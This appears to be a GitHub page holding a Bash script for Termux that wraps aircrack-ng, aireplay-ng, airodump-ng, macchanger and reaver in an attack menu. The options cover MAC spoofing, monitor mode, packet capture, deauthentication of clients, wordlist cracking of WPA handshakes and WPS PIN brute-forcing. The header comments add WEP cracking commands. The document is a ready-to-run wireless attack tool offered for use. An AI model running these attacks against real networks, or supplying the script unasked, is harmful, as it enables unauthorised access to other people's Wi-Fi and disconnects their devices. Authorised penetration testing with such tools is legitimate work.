-
Notifications
You must be signed in to change notification settings - Fork 4
/
termux-air-kit.sh
180 lines (169 loc) · 5.14 KB
/
termux-air-kit.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
#!/data/data/com.termux/files/usr/bin/bash
# CODED BY: JASYON CABRILLAS SAN BUENAVENTURA
# FACEBOOK: https://web.facebook.com/mkdirlove.git
# GITHUB : https://githib.com/mkdirlove
# Restart network interface:
# ifconfig <interface> down
# ifconfig <interface> up
# Kill the baffling processes:
# airmon-ng check kill
# Crack WEP:
# airodump-ng --ivs -w xxx --bssid <AP BSSID> wlan0mon
# aireplay-ng -1 0 -a <AP BSSID> wlan0mon
# aireplay-ng -3 -b <AP BSSID> wlan0mon
# aircrack-ng xxx.ivs
# Recovry password with your known PIN:
# reaver -i <interface> -b <AP_MAC> -p <Your PIN> -vv
CURRENT_MAC=''
logo()
{
echo ""
echo -e " \e[5m\e[93m @@@@@@ @@@ @@@@@@@ \e[25m@@@ @@@ @@@ @@@@@@@ "
echo -e " \e[5m\e[93m @@@@@@@@ @@@ @@@@@@@@ \e[25m@@@ @@@ @@@ @@@@@@@ "
echo -e " \e[5m\e[93m @@! @@@ @@! @@! @@@ \e[25m@@! !@@ @@! @@! "
echo -e " \e[5m\e[93m !@! @!@ !@! !@! @!@ \e[25m!@! @!! !@! !@! "
echo -e " \e[5m\e[93m @!@!@!@! !!@ @!@!!@! \e[25m@!@!@!@!@ \e[25m@!@@!@! !!@ @!! "
echo -e " \e[5m\e[93m !!!@!!!! !!! !!@!@! \e[25m!!!@!@!!! \e[25m!!@!!! !!! !!! "
echo -e " \e[5m\e[93m !!: !!! !!: !!: :!! \e[25m!!: :!! !!: !!: "
echo -e " \e[5m\e[93m :!: !:! :!: :!: !:! \e[25m:!: !:! :!: :!: "
echo -e " \e[5m\e[93m :: ::: :: :: ::: \e[25m :: ::: :: :: "
echo -e " \e[5m\e[93m : : : : : : : \e[25m : ::: : : "
echo -e " \e[91m[ THIS AIR-KIT VERSION IS NOW AVAILABLE FOR TERMUX USERS ] "
echo -e " \e[93m[ CODED BY: \e[5mJAYSON CABRILLAS SAN BUENAVENTURA\e[25m ] "
}
menu(){
echo ""
echo -e " \e[95mCONFIGURATIONS \e[96mWPA/WPA2 ATTACKS \e[91mWPS ATTACKS"
echo -e "\e[93m ═════════════════════════════════════════════════════════════════════════"
echo -e " \e[95m1) Spoof MAC Address \e[96m5) Wireless Packet Capture \e[91m8) PIN Attack WPS"
echo -e " \e[95m2) Start Monitor Mode \e[96m6) Deauth Attack \e[91m9) Exit"
echo -e " \e[95m3) Stop Monitor Mode \e[96m7) Bruteforce Attack"
echo -e " \e[95m4) Sniff Wireless Network"
echo ""
}
clear
logo
echo ""
menu
if [ $# -eq 1 ] ; then
if [ "$1" = '-h' ] || [ "$1" = '--help' ]; then
menu
exit
elif [ "$1" ]; then
opt="$1"
fi
elif [ $# -eq 0 ] ; then
echo -e "\e[93m"
read -p "Choose attack: " opt
fi
case $opt in
1)
echo
echo "[*] Spoof MAC Address"
echo "------------------------"
iwconfig
echo "[*] Which interface:";read iface
ifconfig $iface down
echo "[*] Specify your new mac (default: random mac)"; read new_mac
if [ "$new_mac" ] ; then
macchanger -m $new_mac $iface
else
macchanger -r $iface
fi
ifconfig $iface up
#Check it again
echo
macchanger -s $iface
;;
2)
echo
echo "[*] Start Monitor Mode"
echo "------------------------"
iwconfig
echo "[*] Which interface:";read iface
airmon-ng start $iface
;;
3)
echo
echo "[*] Stop Monotor Mode"
echo "------------------------"
airmon-ng
echo "[*] Which interface:";read iface
airmon-ng stop $iface
iwconfig
;;
4)
echo
echo "[*] Start airodump to sniff network using wep/wpa/wpa2"
echo "--------------------------------------------------------"
airmon-ng
echo "[*] Which interface:";read iface
airodump-ng $iface
;;
5)
echo
echo "[*] Packet Capture"
echo "----------------------"
airmon-ng
echo "[*] Which interface:";read iface
echo "[*] Which channel:";read ch
echo "[*] Which AP BSSID:";read bssid
echo "[*] Safe as: (default: $bssid-01.cap)";read filename
if [ "$filename" ];then
airodump-ng $iface -c $ch --bssid $bssid -w $filename
else
airodump-ng $iface -c $ch --bssid $bssid -w $bssid
fi
;;
6)
echo
echo "[*] Deassociation Attack (default 2 deauth packet will be send)"
echo "-----------------------------------------------------------------"
airmon-ng
echo "[*] which interface";read iface
echo "[*] Which AP BSSID:";read bssid
while :
do
echo "[*] Which Client MAC address (STATION)";read c_mac
aireplay-ng --deauth 2 -a $bssid -c $c_mac $iface
echo "[*] Do it again? [y|n]";read op
if [ "$op" = "n" ]; then
break
fi
done
;;
7)
echo
echo "[*] Wordlist Attack"
echo "---------------------"
echo "[*] Specify you handshake packet";read hp
echo "[*] Specify you wordlist";read wl
aircrack-ng -w $wl $hp
;;
8)
echo
echo "[*] Crack WPS"
echo "---------------"
airmon-ng
echo "[*] Which interface:";read iface
echo "[*] Which channel:";read ch
echo "[*] Which AP BSSID:";read bssid
echo "[*] Set a signal strength level : (low 1~3 high)";read level
case $level in
1)
reaver -i $iface -b $bssid -S -vv -d0 -c $ch
;;
2)
reaver -i $iface -b $bssid -S -vv -d2 -t 5 -c $ch
;;
3)
reaver -i $iface -b $bssid -S -vv -d5 -c $ch
;;
*)
echo "Invalid Setting!"
;;
esac
;;
*)
echo "[-] Invalid Option!"
esac